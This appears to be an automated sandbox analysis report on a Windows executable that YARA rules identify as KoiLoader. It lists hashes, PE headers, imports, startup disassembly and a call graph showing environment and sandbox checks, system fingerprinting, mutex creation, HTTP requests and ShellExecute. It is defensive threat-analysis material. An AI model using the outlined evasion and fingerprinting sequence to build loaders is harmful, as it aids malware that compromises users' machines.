              Entropy (8bit):5.877116751370657
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:tcmeimnnMZ.exe
              File size:182'272 bytes
              MD5:b3e62e0daf3abe85e035558fed736e91
              SHA1:bfe4ef22d4b4ab14480bc6d71acf677e7f111b29
              SHA256:b09ce5d71929178f5d40479c2c7a4eadd86e4e7f182124702d5fdb0ce393d2ba
              SHA512:8ce78b34ab254e4eb102d3a5428a027aeb05dc8dceeefb30b26ff8e4adcf06a14a425e313ddf122df400657d3ea1d2e1ba5789c4169ac3cb94d2a83a20a365f0
              SSDEEP:3072:zCmlA+2TGMF85+bkRG32foUP9GmPe97Uo+J4vmvfR7E4l2G2K28pmLSNZ:2mlV4h8JG3QUzWL44l2xJLSNZ
              TLSH:02048D44B0CAA436D027AA33566456525B3CFE20DFD3CFCB1794885B4FAD0D1AA31F6A
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`J...$R..$R..$R.j'S..$R.j!SE.$R.j S..$RHz S..$RHz'S..$RHz!S..$R.j%S..$R..%R..$REz-S..$REz.R..$R...R..$REz&S..$RRich..$R.......
              Icon Hash:90cececece8e8eb0
              Entrypoint:0x403d44
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x65D59C0C [Wed Feb 21 06:45:32 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:66deda4204cb009d8c01c3f28c17567f
              Instruction
              call 00007F70344FC2BCh
              jmp 00007F70344FBD2Fh
              push ebp
              mov ebp, esp
              push 00000000h
              call dword ptr [0041105Ch]
              push dword ptr [ebp+08h]
              call dword ptr [00411058h]
              push C0000409h
              call dword ptr [0041100Ch]
              push eax
              call dword ptr [00411014h]
              pop ebp
              ret
              push ebp
              mov ebp, esp
              sub esp, 00000324h
              push 00000017h
              call dword ptr [00411060h]
              test eax, eax
              je 00007F70344FBEB7h
              push 00000002h
              pop ecx
              int 29h
              mov dword ptr [00418A78h], eax
              mov dword ptr [00418A74h], ecx
              mov dword ptr [00418A70h], edx
              mov dword ptr [00418A6Ch], ebx
              mov dword ptr [00418A68h], esi
              mov dword ptr [00418A64h], edi
              mov word ptr [00418A90h], ss
              mov word ptr [00418A84h], cs
              mov word ptr [00418A60h], ds
              mov word ptr [00418A5Ch], es
              mov word ptr [00418A58h], fs
              mov word ptr [00418A54h], gs
              pushfd
              pop dword ptr [00418A88h]
              mov eax, dword ptr [ebp+00h]
              mov dword ptr [00418A7Ch], eax
              mov eax, dword ptr [ebp+04h]
              mov dword ptr [00418A80h], eax
              lea eax, dword ptr [ebp+08h]
              mov dword ptr [00418A8Ch], eax
              mov eax, dword ptr [ebp-00000324h]
              mov dword ptr [004189C8h], 00010001h
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x176900x3c.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x13c38.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000x1130.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x166980x38.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x165d80x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x110000x120.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000xfbea0xfc00f80c6e36c0496492e658927e9cbd2f9aFalse0.5602368551587301data6.555752738036374IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x110000x6d0c0x6e0006a44f2522af6deb8eae500514137c22False0.4388494318181818OpenPGP Public Key4.883697607623019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x180000x163c0xa00b55402247df1a6c6692e0c2bccb8e505False0.1765625data2.3846615292625706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x1a0000x13c380x13e00f909621fde6f57064564af6430d44027False0.4939072327044025data4.867979029174927IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x2e0000x11300x12006250f4910a879ac182f4b8379731bb76False0.7437065972222222data6.405937874038831IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_DIALOG0x1a1180x18cdataEnglishUnited States0.6464646464646465
              RT_RCDATA0x1a2a40x13dataEnglishUnited States1.4736842105263157
              RT_RCDATA0x1a2b80x13800dataEnglishUnited States0.4952549078525641
              RT_MANIFEST0x2dab80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
              DLLImport
              KERNEL32.dllVirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer
              GDI32.dllLPtoDP
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              No network behavior found

              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:04:32:21
              Start date:08/10/2024
              Path:C:\Users\user\Desktop\tcmeimnnMZ.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\tcmeimnnMZ.exe"
              Imagebase:0x620000
              File size:182'272 bytes
              MD5 hash:B3E62E0DAF3ABE85E035558FED736E91
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1723860556.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:7.5%
                Dynamic/Decrypted Code Coverage:17.5%
                Signature Coverage:20.1%
                Total number of Nodes:1248
                Total number of Limit Nodes:9
                execution_graph 10476 e48e60 GetUserDefaultLangID 10477 e48f0c ExitProcess 10476->10477 10478 e48e7d 10476->10478 10478->10477 10492 e48660 10478->10492 10480 e48eea 10480->10477 10481 e48eee 10480->10481 10576 e48380 InitializeCriticalSection 10481->10576 10483 e48ef3 10586 e471b0 ExpandEnvironmentStringsW lstrlenW 10483->10586 10485 e48ef8 10593 e48fc0 CryptGenRandom 10485->10593 10491 e48f07 10491->10477 10493 e4866d 10492->10493 10494 e48682 EnumDisplayDevicesW 10493->10494 10495 e4871a GetModuleHandleA GetProcAddress GetProcAddress 10494->10495 10496 e486aa 10494->10496 10498 e48756 ExpandEnvironmentStringsW ExpandEnvironmentStringsW GetFileAttributesW 10495->10498 10499 e48750 10495->10499 10497 e486b0 StrStrIW 10496->10497 10502 e487b5 10497->10502 10503 e486c7 StrStrIW 10497->10503 10500 e48796 10498->10500 10501 e487be SHGetFolderPathW SHGetFolderPathW PathCombineW GetFileAttributesW 10498->10501 10499->10498 10500->10501 10504 e4879a GetFileAttributesW 10500->10504 10512 e48816 10501->10512 10502->10480 10503->10502 10506 e486dd StrStrIW 10503->10506 10504->10501 10507 e487a8 10504->10507 10506->10502 10508 e486f3 StrStrIW 10506->10508 10507->10501 10509 e487ac 10507->10509 10508->10502 10510 e48709 EnumDisplayDevicesW 10508->10510 10509->10502 10510->10495 10510->10497 10511 e48845 PathCombineW GetFileAttributesW 10511->10512 10512->10502 10512->10511 10513 e48889 10512->10513 10513->10502 10514 e48898 PathCombineW PathCombineW GetFileAttributesW 10513->10514 10515 e488e0 10514->10515 10516 e48a5e PathCombineW GetFileAttributesW 10514->10516 10515->10516 10517 e488e8 GetFileAttributesW 10515->10517 10518 e48b49 ExpandEnvironmentStringsW GetFileAttributesW 10516->10518 10519 e48a89 10516->10519 10517->10516 10522 e488fa 10517->10522 10520 e48b93 GetComputerNameW GetUserNameW 10518->10520 10521 e48b6e 10518->10521 10519->10518 10523 e48a91 CreateFileW 10519->10523 10526 e48c00 lstrcmpW 10520->10526 10521->10520 10524 e48b72 GetFileAttributesExW 10521->10524 10522->10516 10525 e48902 CreateFileW 10522->10525 10527 e48b02 10523->10527 10528 e48abf GetFileSize GetProcessHeap HeapAlloc 10523->10528 10524->10520 10531 e48b89 10524->10531 10532 e4893d GetFileSize GetProcessHeap HeapAlloc 10525->10532 10533 e4897e CreateFileW 10525->10533 10526->10502 10534 e48c18 10526->10534 10529 e48b0c lstrcmpA 10527->10529 10530 e48b2b 10527->10530 10535 e48ae0 ReadFile 10528->10535 10536 e48af9 CloseHandle 10528->10536 10529->10530 10537 e48b3f 10530->10537 10538 e48b2f GetProcessHeap HeapFree 10530->10538 10531->10502 10531->10520 10539 e48977 CloseHandle 10532->10539 10540 e48960 ReadFile 10532->10540 10542 e489a5 GetFileSize GetProcessHeap HeapAlloc 10533->10542 10543 e489e8 10533->10543 10534->10526 10541 e48c1f StrStrW 10534->10541 10535->10536 10536->10527 10537->10502 10537->10518 10538->10537 10539->10533 10540->10539 10541->10502 10545 e48c39 lstrcmpW 10541->10545 10546 e489c6 ReadFile 10542->10546 10547 e489df CloseHandle 10542->10547 10544 e48a29 10543->10544 10548 e489f8 lstrcmpA 10543->10548 10549 e48a40 10544->10549 10550 e48a30 GetProcessHeap HeapFree 10544->10550 10551 e48c5e 10545->10551 10552 e48c4b lstrcmpW 10545->10552 10546->10547 10547->10543 10548->10544 10554 e48a0a lstrcmpA 10548->10554 10555 e48a54 10549->10555 10556 e48a44 GetProcessHeap HeapFree 10549->10556 10550->10549 10553 e48c75 lstrcmpW 10551->10553 10557 e48c91 GlobalMemoryStatusEx 10551->10557 10552->10502 10552->10551 10553->10502 10553->10551 10554->10544 10555->10502 10555->10516 10556->10555 10557->10502 10558 e48cc4 lstrcmpW 10557->10558 10559 e48cd6 lstrcmpW 10558->10559 10560 e48cf1 PathCombineW 10558->10560 10559->10560 10561 e48ce5 10559->10561 10562 e48d10 10560->10562 10561->10502 10561->10560 10562->10562 10563 e48d20 FindFirstFileW 10562->10563 10564 e48d40 10563->10564 10565 e48e32 GetModuleFileNameW StrStrIW 10563->10565 10566 e48d50 lstrcmpW 10564->10566 10565->10480 10567 e48e04 FindNextFileW 10566->10567 10568 e48d66 lstrcmpW 10566->10568 10567->10566 10569 e48e1a FindClose 10567->10569 10568->10567 10570 e48d7c lstrcmpW 10568->10570 10569->10502 10569->10565 10572 e48dc7 lstrcmpW 10570->10572 10573 e48dbb lstrcmpW 10570->10573 10574 e48ddf 10572->10574 10575 e48dd3 lstrcmpW 10572->10575 10573->10572 10573->10574 10574->10567 10575->10574 10633 e47050 10576->10633 10579 e48561 ExitProcess 10580 e4846f 10641 e424e0 GetTickCount 10580->10641 10582 e48474 WSAStartup CryptAcquireContextA 10583 e484bf CryptAcquireContextA 10582->10583 10584 e484df CoInitializeEx ExpandEnvironmentStringsW CreateFileW 10582->10584 10583->10579 10583->10584 10584->10483 10587 e471e4 ExpandEnvironmentStringsW 10586->10587 10588 e471f7 GetSystemWow64DirectoryW 10586->10588 10587->10588 10589 e47213 ExpandEnvironmentStringsW wnsprintfW 10588->10589 10590 e4720d GetLastError 10588->10590 10643 e46c00 VariantInit CoCreateInstance 10589->10643 10590->10589 10594 e48ffc 10593->10594 10679 e42680 GetProcessHeap HeapAlloc 10594->10679 10597 e49032 GetProcessHeap HeapFree 10598 e4903e 10597->10598 10599 e42680 2 API calls 10598->10599 10600 e4904d 10599->10600 10601 e48efd 10600->10601 10602 e49056 wsprintfA 10600->10602 10606 e47690 GetPEB LsaOpenPolicy 10601->10606 10603 e49081 10602->10603 10605 e4909f GetProcessHeap HeapFree GetProcessHeap HeapFree 10603->10605 10681 e466e0 ObtainUserAgentString MultiByteToWideChar 10603->10681 10605->10601 10607 e476d6 LsaQueryInformationPolicy 10606->10607 10608 e4774b GetComputerNameW GetUserNameW 10606->10608 10610 e47742 LsaClose 10607->10610 10611 e476e9 10607->10611 10609 e4779b 10608->10609 10614 e424e0 GetTickCount 10609->10614 10616 e477ca 10609->10616 10610->10608 10612 e476f1 GetProcessHeap HeapAlloc 10611->10612 10613 e4773b LsaFreeMemory 10611->10613 10615 e4770e 10612->10615 10613->10610 10614->10609 10615->10613 10617 e477d9 wsprintfA wsprintfA 10616->10617 10618 e47836 10617->10618 10618->10618 10619 e466e0 32 API calls 10618->10619 10620 e4786a 10619->10620 10621 e47885 10620->10621 10622 e4787d GetProcessHeap HeapFree 10620->10622 10623 e47891 10621->10623 10624 e47889 GetProcessHeap HeapFree 10621->10624 10622->10621 10625 e48570 ExpandEnvironmentStringsW ExpandEnvironmentStringsW ExpandEnvironmentStringsW 10623->10625 10624->10623 10626 e485c0 10625->10626 10626->10626 10627 e485d0 GetFileAttributesW 10626->10627 10628 e485e4 10627->10628 10629 e485ef GetFileAttributesW 10627->10629 10628->10629 10632 e485e8 10628->10632 10630 e48613 wnsprintfW ShellExecuteW 10629->10630 10629->10632 10630->10491 10631 e48606 lstrcpyW 10631->10630 10632->10630 10632->10631 10634 e4706e RegOpenKeyExW 10633->10634 10635 e47091 RegQueryValueExW 10634->10635 10636 e470dd 10634->10636 10635->10636 10637 e470a9 GetProcessHeap HeapAlloc 10635->10637 10636->10634 10639 e470e0 RegCloseKey 10636->10639 10640 e4710b GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 10636->10640 10637->10636 10638 e470c5 RegQueryValueExW 10637->10638 10638->10639 10639->10636 10639->10640 10640->10579 10640->10580 10642 e424f0 10641->10642 10642->10582 10642->10642 10644 e46c5b 10643->10644 10650 e46caa 10643->10650 10647 e46c8c SysAllocString 10644->10647 10644->10650 10645 e46cd0 10648 e47018 SetFileAttributesW 10645->10648 10649 e46cda SysAllocString 10645->10649 10646 e46ccd SysFreeString 10646->10645 10647->10650 10648->10485 10651 e46cfd SysFreeString 10649->10651 10650->10645 10650->10646 10652 e46d2d 10651->10652 10653 e46d0d SysAllocString 10651->10653 10654 e46d31 SysAllocString 10652->10654 10657 e46d49 10652->10657 10655 e46d24 SysFreeString 10653->10655 10656 e46d46 SysFreeString 10654->10656 10655->10652 10656->10657 10657->10648 10658 e46d7f SysAllocString 10657->10658 10661 e46db7 10657->10661 10659 e46d92 SysFreeString SysAllocString 10658->10659 10660 e46da8 SysFreeString 10659->10660 10660->10661 10662 e46e1b 10661->10662 10663 e46df9 SysAllocString 10661->10663 10666 e46e7a SysAllocString 10662->10666 10669 e46edd 10662->10669 10664 e46e0c SysFreeString 10663->10664 10664->10662 10665 e46f7d 10665->10648 10667 e46fa6 VariantInit SysAllocString SysAllocString 10665->10667 10668 e46e8d SysFreeString SysAllocString 10666->10668 10670 e47008 SysFreeString VariantClear 10667->10670 10671 e46ea3 SysFreeString 10668->10671 10669->10665 10672 e46f4e SysAllocString 10669->10672 10670->10648 10673 e46eba 10671->10673 10674 e46f61 SysFreeString 10672->10674 10673->10669 10675 e46ebe SysAllocString 10673->10675 10674->10665 10676 e46f6b SysAllocString 10674->10676 10677 e46ed1 SysFreeString 10675->10677 10678 e46f7a SysFreeString 10676->10678 10677->10669 10678->10665 10680 e426bc 10679->10680 10680->10597 10680->10598 10682 e46731 GetProcessHeap HeapAlloc 10681->10682 10683 e4672a 10681->10683 10682->10683 10684 e4674f MultiByteToWideChar 10682->10684 10710 e46520 10683->10710 10684->10683 10686 e4677a InternetOpenW 10698 e46778 10686->10698 10687 e467b6 InternetSetOptionW 10687->10687 10689 e467cd InternetConnectW 10687->10689 10688 e46926 10690 e46941 10688->10690 10691 e46939 GetProcessHeap HeapFree 10688->10691 10692 e467f1 HttpOpenRequestW 10689->10692 10693 e46908 InternetCloseHandle 10689->10693 10694 e46950 10690->10694 10695 e46948 GetProcessHeap HeapFree 10690->10695 10691->10690 10696 e46827 InternetQueryOptionW 10692->10696 10697 e468fc 10692->10697 10693->10688 10693->10698 10699 e46957 GetProcessHeap HeapFree 10694->10699 10700 e4695f 10694->10700 10695->10694 10702 e46860 HttpSendRequestW 10696->10702 10703 e4684a InternetSetOptionW 10696->10703 10701 e46902 InternetCloseHandle 10697->10701 10698->10686 10698->10687 10698->10688 10699->10700 10700->10603 10701->10693 10704 e468f1 InternetCloseHandle 10702->10704 10706 e46878 10702->10706 10703->10702 10704->10701 10705 e46880 InternetQueryDataAvailable 10705->10706 10706->10704 10706->10705 10707 e468a7 GetProcessHeap HeapAlloc 10706->10707 10708 e468b8 GetProcessHeap HeapReAlloc 10706->10708 10709 e468c8 InternetReadFile 10707->10709 10708->10709 10709->10706 10711 e46530 InternetCrackUrlW 10710->10711 10713 e46593 GetProcessHeap HeapAlloc 10711->10713 10716 e4662e 10711->10716 10715 e465bc GetProcessHeap HeapAlloc 10713->10715 10713->10716 10715->10716 10716->10698 10717 623bc8 10718 623bd4 __FrameHandler3::FrameUnwindToState 10717->10718 10743 623f25 10718->10743 10720 623bdb 10721 623d2e 10720->10721 10732 623c05 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 10720->10732 10786 62421c IsProcessorFeaturePresent 10721->10786 10723 623d35 10790 6276e3 10723->10790 10728 623c24 10729 623ca5 10751 624337 10729->10751 10731 623cab 10755 622f40 10731->10755 10732->10728 10732->10729 10769 6276bd 10732->10769 10738 623cd4 10780 624099 10738->10780 10739 623ccb 10739->10738 10777 627698 10739->10777 10744 623f2e 10743->10744 10796 6244c5 IsProcessorFeaturePresent 10744->10796 10748 623f3f 10749 623f43 10748->10749 10806 624ecd 10748->10806 10749->10720 10866 624f20 10751->10866 10754 62435d 10754->10731 10868 622ae0 10755->10868 10758 622f81 GetLastError 10759 622f8c ExitProcess 10758->10759 10760 622f94 BuildCommDCBAndTimeoutsA 10758->10760 10761 622fb6 10760->10761 10762 622fa7 GetCurrentProcess TerminateProcess 10760->10762 10940 621710 10761->10940 10762->10761 10768 622fe0 10775 62436d GetModuleHandleW 10768->10775 10770 6276d3 __FrameHandler3::FrameUnwindToState _free 10769->10770 10770->10729 11371 62832a GetLastError 10770->11371 10776 623cc7 10775->10776 10776->10723 10776->10739 11920 62753e 10777->11920 10781 6240a5 10780->10781 10782 623cdc 10781->10782 11990 627cfb 10781->11990 10782->10728 10784 6240b3 10785 624ecd ___scrt_uninitialize_crt 7 API calls 10784->10785 10785->10782 10787 624232 _unexpected 10786->10787 10788 6242dd IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10787->10788 10789 624328 _unexpected 10788->10789 10789->10723 10791 62753e _unexpected 23 API calls 10790->10791 10792 623d3b 10791->10792 10793 6276a7 10792->10793 10794 62753e _unexpected 23 API calls 10793->10794 10795 623d43 10794->10795 10797 623f3a 10796->10797 10798 624eae 10797->10798 10812 6260a7 10798->10812 10801 624eb7 10801->10748 10803 624ebf 10804 624eca 10803->10804 10826 6260e3 10803->10826 10804->10748 10807 624ee0 10806->10807 10808 624ed6 10806->10808 10807->10749 10809 625169 ___vcrt_uninitialize_ptd 6 API calls 10808->10809 10810 624edb 10809->10810 10811 6260e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10810->10811 10811->10807 10813 6260b0 10812->10813 10815 6260d9 10813->10815 10816 624eb3 10813->10816 10830 6262ec 10813->10830 10817 6260e3 ___vcrt_uninitialize_locks DeleteCriticalSection 10815->10817 10816->10801 10818 625136 10816->10818 10817->10816 10847 6261fd 10818->10847 10821 62514b 10821->10803 10824 625166 10824->10803 10827 62610d 10826->10827 10828 6260ee 10826->10828 10827->10801 10829 6260f8 DeleteCriticalSection 10828->10829 10829->10827 10829->10829 10835 626112 10830->10835 10833 626324 InitializeCriticalSectionAndSpinCount 10834 62630f 10833->10834 10834->10813 10836 62612f 10835->10836 10839 626133 10835->10839 10836->10833 10836->10834 10837 62619b GetProcAddress 10837->10836 10839->10836 10839->10837 10840 62618c 10839->10840 10842 6261b2 LoadLibraryExW 10839->10842 10840->10837 10841 626194 FreeLibrary 10840->10841 10841->10837 10843 6261c9 GetLastError 10842->10843 10845 6261f9 10842->10845 10844 6261d4 10843->10844 10843->10845 10844->10845 10846 6261ea LoadLibraryExW 10844->10846 10845->10839 10846->10839 10848 626112 ___vcrt_FlsSetValue 5 API calls 10847->10848 10849 626217 10848->10849 10850 626230 TlsAlloc 10849->10850 10851 625140 10849->10851 10851->10821 10852 6262ae 10851->10852 10853 626112 ___vcrt_FlsSetValue 5 API calls 10852->10853 10854 6262c8 10853->10854 10855 6262e3 TlsSetValue 10854->10855 10856 625159 10854->10856 10855->10856 10856->10824 10857 625169 10856->10857 10858 625173 10857->10858 10860 625179 10857->10860 10861 626238 10858->10861 10860->10821 10862 626112 ___vcrt_FlsSetValue 5 API calls 10861->10862 10863 626252 10862->10863 10864 62626a TlsFree 10863->10864 10865 62625e 10863->10865 10864->10865 10865->10860 10867 62434a GetStartupInfoW 10866->10867 10867->10754 10869 622b16 10868->10869 10971 623040 10869->10971 10874 623040 27 API calls 10875 622bb9 10874->10875 10996 622870 10875->10996 10878 623040 27 API calls 10879 622c1c 10878->10879 10999 6228a0 10879->10999 10884 623040 27 API calls 10885 622c5c 10884->10885 10886 623040 27 API calls 10885->10886 10887 622c75 10886->10887 11019 622a60 10887->11019 10891 622c9b 10892 623040 27 API calls 10891->10892 10893 622cd2 10892->10893 10894 623040 27 API calls 10893->10894 10895 622d05 10894->10895 11029 622450 10895->11029 10898 623040 27 API calls 10899 622d23 10898->10899 11048 622540 10899->11048 10906 623040 27 API calls 10907 622d7b 10906->10907 10908 623040 27 API calls 10907->10908 10909 622d94 10908->10909 10910 623040 27 API calls 10909->10910 10911 622dad 10910->10911 11095 621e90 10911->11095 10914 623040 27 API calls 10915 622df2 10914->10915 10916 623040 27 API calls 10915->10916 10917 622e1b 10916->10917 11124 621ff0 10917->11124 10920 623040 27 API calls 10921 622e40 10920->10921 11135 622090 10921->11135 10924 623020 task 25 API calls 10925 622e5d 10924->10925 10926 623040 27 API calls 10925->10926 10927 622e6f 10926->10927 10928 623040 27 API calls 10927->10928 10929 622e88 10928->10929 10930 623040 27 API calls 10929->10930 10931 622ea1 10930->10931 10932 623040 27 API calls 10931->10932 10933 622eba 10932->10933 10934 623040 27 API calls 10933->10934 10935 622ed9 10934->10935 10936 623020 task 25 API calls 10935->10936 10937 622f01 10936->10937 11140 6221a0 10937->11140 11350 621110 GetModuleHandleA 10940->11350 10942 62173c 10943 621110 17 API calls 10942->10943 10946 621750 10943->10946 10944 626940 ___std_exception_copy 14 API calls 10945 621848 10944->10945 10947 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 10945->10947 10949 626b68 ___std_exception_copy 15 API calls 10946->10949 10956 62183c 10946->10956 10948 621855 10947->10948 10957 622ff0 10948->10957 10950 62178f 10949->10950 11356 621300 GetModuleHandleA VirtualAlloc 10950->11356 10953 626940 ___std_exception_copy 14 API calls 10954 621830 10953->10954 10955 626940 ___std_exception_copy 14 API calls 10954->10955 10955->10956 10956->10944 10958 623020 task 25 API calls 10957->10958 10959 623002 10958->10959 10960 623020 task 25 API calls 10959->10960 10961 62300d 10960->10961 10962 623020 task 25 API calls 10961->10962 10963 622fd0 10962->10963 10964 623a94 10963->10964 10965 623a9c 10964->10965 10966 623a9d IsProcessorFeaturePresent 10964->10966 10965->10768 10968 623d8b 10966->10968 11370 623d4e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10968->11370 10970 623e6e 10970->10768 10972 623075 operator!= char_traits 10971->10972 11175 623440 10972->11175 10975 6226f0 10976 623040 27 API calls 10975->10976 10977 622753 10976->10977 10978 623040 27 API calls 10977->10978 10979 622779 10978->10979 10980 623040 27 API calls 10979->10980 10981 622791 10980->10981 10982 623040 27 API calls 10981->10982 10983 6227ae operator!= 10982->10983 10984 623020 task 25 API calls 10983->10984 10985 6227cf 10984->10985 10986 623020 task 25 API calls 10985->10986 10988 6227de 10986->10988 10987 623020 task 25 API calls 10989 62282e 10987->10989 10988->10987 10990 623020 task 25 API calls 10989->10990 10991 62283a 10990->10991 10992 623020 task 25 API calls 10991->10992 10993 622849 10992->10993 10994 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 10993->10994 10995 62285e 10994->10995 10995->10874 10997 623020 task 25 API calls 10996->10997 10998 62288e 10997->10998 10998->10878 11000 623040 27 API calls 10999->11000 11001 6228e6 11000->11001 11002 623040 27 API calls 11001->11002 11005 62290f 11002->11005 11003 623020 task 25 API calls 11004 6229b7 11003->11004 11006 623020 task 25 API calls 11004->11006 11005->11003 11007 6229c3 11006->11007 11008 623020 task 25 API calls 11007->11008 11009 6229d2 11008->11009 11010 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11009->11010 11011 6229e7 11010->11011 11012 6229f0 11011->11012 11013 623040 27 API calls 11012->11013 11015 622a14 11013->11015 11014 623020 task 25 API calls 11016 622a48 11014->11016 11015->11014 11017 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11016->11017 11018 622a52 11017->11018 11018->10884 11020 623040 27 API calls 11019->11020 11021 622aa3 11020->11021 11022 623020 task 25 API calls 11021->11022 11023 622ab8 11022->11023 11024 623020 task 25 API calls 11023->11024 11025 622ac7 11024->11025 11026 623020 11025->11026 11335 623160 11026->11335 11028 62302f task 11028->10891 11030 623040 27 API calls 11029->11030 11031 62248f 11030->11031 11032 623040 27 API calls 11031->11032 11033 6224ad 11032->11033 11034 623040 27 API calls 11033->11034 11035 6224dc 11034->11035 11036 623020 task 25 API calls 11035->11036 11037 6224eb 11036->11037 11038 623020 task 25 API calls 11037->11038 11039 6224f7 11038->11039 11040 623020 task 25 API calls 11039->11040 11041 622503 11040->11041 11042 623020 task 25 API calls 11041->11042 11043 62250f 11042->11043 11044 623020 task 25 API calls 11043->11044 11045 62251e 11044->11045 11046 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11045->11046 11047 622536 11046->11047 11047->10898 11049 623040 27 API calls 11048->11049 11050 62258f 11049->11050 11051 623040 27 API calls 11050->11051 11052 6225e1 11051->11052 11053 623040 27 API calls 11052->11053 11054 6225fb operator!= 11053->11054 11055 623020 task 25 API calls 11054->11055 11056 622619 11055->11056 11057 623020 task 25 API calls 11056->11057 11058 622628 11057->11058 11059 623020 task 25 API calls 11058->11059 11060 6226c2 11059->11060 11061 623020 task 25 API calls 11060->11061 11062 6226d1 11061->11062 11063 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11062->11063 11064 6226e6 11063->11064 11065 621bd0 11064->11065 11066 623040 27 API calls 11065->11066 11067 621c15 11066->11067 11068 623040 27 API calls 11067->11068 11069 621c30 11068->11069 11070 623040 27 API calls 11069->11070 11071 621c4a operator!= 11070->11071 11072 623020 task 25 API calls 11071->11072 11073 621c68 11072->11073 11074 623020 task 25 API calls 11073->11074 11075 621c77 11074->11075 11076 623020 task 25 API calls 11075->11076 11077 621d14 11076->11077 11078 623a94 __ehhandler$___std_fs_get_file_id@8 5 API calls 11077->11078 11079 621d29 11078->11079 11080 621d30 11079->11080 11081 623040 27 API calls 11080->11081 11082 621d68 11081->11082 11083 623040 27 API calls 11082->11083 11084 621d94 11083->11084 11085 623040 27 API calls 11084->11085 11086 621dae operator!= 11085->11086 11087 623020 task 25 API 